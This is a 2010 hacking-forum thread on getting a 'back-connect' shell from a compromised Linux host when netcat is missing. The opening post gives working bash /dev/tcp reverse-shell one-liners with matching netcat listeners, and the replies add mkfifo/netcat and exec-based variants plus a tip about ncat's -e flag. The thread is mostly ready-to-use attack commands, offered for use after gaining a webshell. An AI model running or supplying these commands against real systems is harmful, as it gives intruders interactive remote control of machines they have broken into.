Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Get back-connect shell with bash
Posted by: kevin85
Date: June 28, 2010 11:49AM

Get back-connect shell with bash

By: xi4oyu & akshell
Site: http://www.linuxpentest.com
For more Linux hacking & harden info, Plz keep looking around..

During pentest, we may we may not have netcat pre-installed on the target system.This situation often happens when we have got a webshell on the target . As we wanna get a connectback shell. One command is Enough. See example belows…


1. Listen 2 ports on your own system with netcat .

one shell we execute the following command:
akshell@linuxpentest.com:~$ nc -vv -l -p 5566
Listening on any address 5566

In another terminal we execute:
akshell@linuxpentest:~$ nc -vv -l -p 5567
Listening on any address 5567

2. On our “target” system(often in the webshell )
nobody@webshell:~$ /bin/bash < /dev/tcp/ourip/5567 &>/dev/tcp/ourip/5566

Replace the above ourip to your true ip.

If your are lucky enough , you will see two connection from the “target”.

now your can input command in the port 5567 terminal & see the result in the 5566 one.

Besides , your can also use one single terminal. Listen port 6666 on your own system .

Enter the following command like this on the “target” system.

/bin/bash -i > /dev/tcp/yourip/6666 0>&1

Now your can do what u want

That’s All . :)

Linux Pentest Sites
http://www.linuxpentest.com

Options: ReplyQuote
Re: Get back-connect shell with bash
Posted by: chosi
Date: June 29, 2010 03:37PM

Current Ubuntu's netcat does not come with an -e switch (i.e. executing commands directly from within netcat), so I saw this workaround, which might fit into this thread:

listening:
mkfifo mypipe;cat mypipe|/bin/bash|nc -l 6000 >mypipe;rm mypipe
connecting:
mkfifo mypipe;cat mypipe|/bin/bash|nc backconnect-address 12344 >mypipe;rm mypipe
(change backconnectaddress and/or ports)

P.S.: Your solution can be improved with a named pipe, like
exec 3<>/dev/tcp/ip/port && `cat <&3`

Options: ReplyQuote
Re: Get back-connect shell with bash
Posted by: id
Date: June 29, 2010 03:49PM

A lot of systems might have a newer version of nmap installed, which contains ncat and supports the -e/--exec flag.

-id

Options: ReplyQuote


Sorry, only registered users may post in this forum.